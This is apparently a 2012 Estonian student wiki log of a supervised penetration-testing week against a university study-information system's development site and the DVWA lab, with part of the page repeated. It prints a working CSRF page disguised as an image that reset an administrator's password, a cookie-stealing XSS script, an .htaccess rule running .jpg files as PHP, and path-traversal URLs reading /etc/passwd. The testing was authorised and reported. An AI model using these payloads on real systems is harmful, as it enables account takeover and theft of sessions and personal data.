[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:10:54Z

Ulihten: /* CSRF - Cross-site request forgery */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

::A1: Injection - Urmo
::A2: Cross-Site Scripting (XSS) - Alo
::A3: Broken Authentication and Session Management - Sander
::A4: Insecure Direct Object References - Alo
::A5: Cross-Site Request Forgery (CSRF) - Taavi
::A6: Security Misconfiguration - Matis
::A7: Insecure Cryptographic Storage - Matis
::A8: Failure to Restrict URL Access - Urmo
::A9: Insufficient Transport Layer Protection - Taavi
::A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
:1.1 Tutvuda OWASP’iga.
:1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
:1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
:2.1 Esitada tiimi tegevusplaan.
:2.2 Tutvuda turvariskidega natuke põhjalikumalt.
:2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
:2.4 Täiendada esimese päeva ettekannet.
3. Päev
:3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
:3.2 Saadud tulemuste dokumenteerimine.
4. Päev
:4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
:5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
:Cross-Site Scripting (XSS)
:SQL Injection (blind test)
:File inclusion
:Code Execution
:LDAP Injection
:Cross Frame Scripting
:SQL Injection (error msg. test)
:CRLF Injection
:Directory Travelsal
:XPath Injection
:URL Redirection
:Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.

Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".

Määrata ära tuli ka, et mitu päringut sekundis tehakse.

Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.

Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.

Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.

Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.

Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.

Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.

Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.

Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.

Ründe stiiliks määrata Pitchfork.

Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.

Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.

Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.

Kahjuks ka see rünne ei toiminud teadmata põhjusel.

Proovitud sai ka lühemate nimekirjadega aga edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.

Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5.sekundiks sisselogimine ära vastava teatega.

Brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine.

Rünnatav inimene ise paneb meie tehtud veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse sealt info koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.

Võtsime lehe Source Code lahti

Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.

Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.

Current Password lahtri jätsime samaks.

Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".

Salvestasime faili ja käivitasime selle.

Tuli ette ainult lahter Current Passwordi ja Submit nupuga.

Panime sisse tolle hetke parooli ning saatsime teele päringu.

Seejärel saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud väärtus.

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
